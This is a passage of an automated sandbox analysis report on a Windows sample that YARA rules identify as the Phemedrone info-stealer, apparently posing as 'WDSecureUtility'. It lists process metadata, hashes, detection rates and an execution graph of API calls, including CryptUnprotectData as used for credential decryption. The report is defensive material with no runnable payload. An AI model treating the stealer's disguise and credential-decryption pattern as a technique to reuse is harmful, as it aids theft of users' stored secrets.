                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:03:42:13
                                                            Start date:04/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:03:42:19
                                                            Start date:04/11/2024
                                                            Path:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y
                                                            Imagebase:0x2747d930000
                                                            File size:240'640 bytes
                                                            MD5 hash:0FF0576F91E4F548CA0D223462B2586C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 68%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFB4B5C1C7E Relevance: .5, Instructions: 458COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1594603916.00007FFB4B5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B5C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b5c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b3e0b9c1fb5735e5c532162c6f1f46d88b121fb31eba0437bc806c18dcdb354
                                                              • Instruction ID: 5619550fbeb3cd3fef02b5e93b29226749f129da99e71dda0bf2528b2fd32987
                                                              • Opcode Fuzzy Hash: 5b3e0b9c1fb5735e5c532162c6f1f46d88b121fb31eba0437bc806c18dcdb354
                                                              • Instruction Fuzzy Hash: 09D105A290EBC50FE797BB7888751A4BFE1EF56210B1940FBD298CB1E3D9095C19C352
                                                              Function 00007FFB4B5C1D4A Relevance: .1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1594603916.00007FFB4B5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B5C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b5c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34219742b1f44b357f498f727cd8ef4c1063db9fd1c1066541585688b72152df
                                                              • Instruction ID: dd48f4400db365f35d0689227143299daf30c04db1ca2906d26beebb71738501
                                                              • Opcode Fuzzy Hash: 34219742b1f44b357f498f727cd8ef4c1063db9fd1c1066541585688b72152df
                                                              • Instruction Fuzzy Hash: CA31F4E3D0EAC60FF3AABE7889711B8AAE2AF06350B1840F9D358C61E3DD0D5C544352
                                                              Function 00007FFB4B4F38B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1594164193.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b4f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: a6dfc5deab8e3df58ff9834b5d55d5a0a69cc61344483d3f89c0294e6ef6d51d
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: EF01677111CB0C8FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3661DB36E882CB45

                                                              Non-executed Functions

                                                              Function 00007FFB4B4F0F8D Relevance: .3, Instructions: 285COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1594164193.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffb4b4f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f487eafee0514aa08aef97732054a655a2baa6613b26ab7526cb8e6387f8c704
                                                              • Instruction ID: 1ca0809034dc330faee22c28cf3453e5ba41e5b2a13fe30e73b53e23bf68d519
                                                              • Opcode Fuzzy Hash: f487eafee0514aa08aef97732054a655a2baa6613b26ab7526cb8e6387f8c704
                                                              • Instruction Fuzzy Hash: 6D9193D790D7D24FE3536A7CA9A50E57FA0EF5336870E40F7C2C58B0A3E959181A8362

                                                              Execution Graph

                                                              Execution Coverage:14.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:8.1%
                                                              Total number of Nodes:37
                                                              Total number of Limit Nodes:0
                                                              execution_graph 16798 7ffb4b50086a 16801 7ffb4b4ff7e0 16798->16801 16800 7ffb4b50086f 16803 7ffb4b4ff7f9 16801->16803 16802 7ffb4b4ff7fe 16802->16800 16803->16802 16804 7ffb4b4ff9a0 LoadLibraryA 16803->16804 16805 7ffb4b4ff9f4 16804->16805 16805->16800 16794 7ffb4b5103cd 16796 7ffb4b5103ef CreateFileW 16794->16796 16797 7ffb4b5104be 16796->16797 16814 7ffb4b51063d 16815 7ffb4b51065f SetFileInformationByHandle 16814->16815 16817 7ffb4b5106f7 16815->16817 16809 7ffb4b4ff795 16812 7ffb4b4ff7b3 16809->16812 16810 7ffb4b4ff7fe 16811 7ffb4b4ff9a0 LoadLibraryA 16813 7ffb4b4ff9f4 16811->16813 16812->16810 16812->16811 16812->16812 16789 7ffb4b5104f1 16790 7ffb4b5104ff 16789->16790 16791 7ffb4b5105cd 16790->16791 16792 7ffb4b5106b5 SetFileInformationByHandle 16790->16792 16793 7ffb4b5106f7 16792->16793 16780 7ffb4b4ffce2 16781 7ffb4b4ffcf1 CryptUnprotectData 16780->16781 16783 7ffb4b4ffeb9 16781->16783 16784 7ffb4b4ff7e0 16786 7ffb4b4ff7f9 16784->16786 16785 7ffb4b4ff7fe 16786->16785 16787 7ffb4b4ff9a0 LoadLibraryA 16786->16787 16788 7ffb4b4ff9f4 16787->16788 16806 7ffb4b50502d 16807 7ffb4b4ff7e0 LoadLibraryA 16806->16807 16808 7ffb4b505032 16807->16808 16818 7ffb4b50163c 16819 7ffb4b4ff7e0 LoadLibraryA 16818->16819 16820 7ffb4b501641 16819->16820

                                                              Executed Functions

                                                              Function 00007FFB4B4FFCE2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 261encryptionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID: `{XK$`{XK
                                                              • API String ID: 834300711-4200264577
                                                              • Opcode ID: cefb911f6aae6619a75cca272fa48a5a2e096f451b71b16bfa219633bf636696
                                                              • Instruction ID: 1c4fbcafc4f94cad497ecca4919b2cc6d604ceecd6a7807e1b9fd897c20e780d
                                                              • Opcode Fuzzy Hash: cefb911f6aae6619a75cca272fa48a5a2e096f451b71b16bfa219633bf636696
                                                              • Instruction Fuzzy Hash: 9C81D17190CA5D8FDB99EF28D841BE8B7E1FF54310F0082AAD44DD3292DE34A985CB91
                                                              Function 00007FFB4B4FF795 Relevance: 1.8, APIs: 1, Instructions: 323libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 7a98790f5334a5fe9af17276b26d6ca778d112318c4fef7a8265c904fc8bd125
                                                              • Instruction ID: dc3a548f3131a349855c7a60087809e3eeb9d870f9f26080040c52538602f5b7
                                                              • Opcode Fuzzy Hash: 7a98790f5334a5fe9af17276b26d6ca778d112318c4fef7a8265c904fc8bd125
                                                              • Instruction Fuzzy Hash: 42A1F37050DA8D4FDB59EF38C8556F97BE1EF49310F0441BAE84DC72A2DE29A842C791
                                                              Function 00007FFB4B5104F1 Relevance: 1.8, APIs: 1, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e684363345e3e7251e45964a3a405b7930ce44e3acf077b06d56a8a4d23c24
                                                              • Instruction ID: 3cb9d11daae7c1fdc30eb824934f18ddf71ae8ded3425618a2145dffea0e3ca7
                                                              • Opcode Fuzzy Hash: 70e684363345e3e7251e45964a3a405b7930ce44e3acf077b06d56a8a4d23c24
                                                              • Instruction Fuzzy Hash: 0B71287190CA4C4FD758EF68D8156B9B7E1EF99321F0542BFD049C72A3DE24A84687C1
                                                              Function 00007FFB4B5103CD Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 0752585ff71d2acef32bdf3f5c4b68d4ec0b0cd452c82d6b2f9684f7d88c21a6
                                                              • Instruction ID: baba8afc5a26f4a28b2ecb07d69990fff948a3d863c32387f3c796add7f510e6
                                                              • Opcode Fuzzy Hash: 0752585ff71d2acef32bdf3f5c4b68d4ec0b0cd452c82d6b2f9684f7d88c21a6
                                                              • Instruction Fuzzy Hash: 9E41B47190CA5C9FDB58EF68D845AF9BBE0FB69321F04426FE049D3252DB74A841CB81
                                                              Function 00007FFB4B51063D Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1539186622.00007FFB4B4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B4F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b4f0000_WDSecureUtility_594.jbxd
                                                              Similarity
                                                              • API ID: FileHandleInformation
                                                              • String ID:
                                                              • API String ID: 3935143524-0
                                                              • Opcode ID: 00a7fccf77faf1b5a5b48a48a928144ab4628d9a43247dd61087355a9ff6c23e
                                                              • Instruction ID: f5ed5259698b3b6eef3b63e99d85bdecbb5a1656f22058a34e17293d76f78d75
                                                              • Opcode Fuzzy Hash: 00a7fccf77faf1b5a5b48a48a928144ab4628d9a43247dd61087355a9ff6c23e
                                                              • Instruction Fuzzy Hash: 5B31367190DB4C8FDB19DB68D8466F8BBE0EB96321F04426FE089C3293CA646856C7D1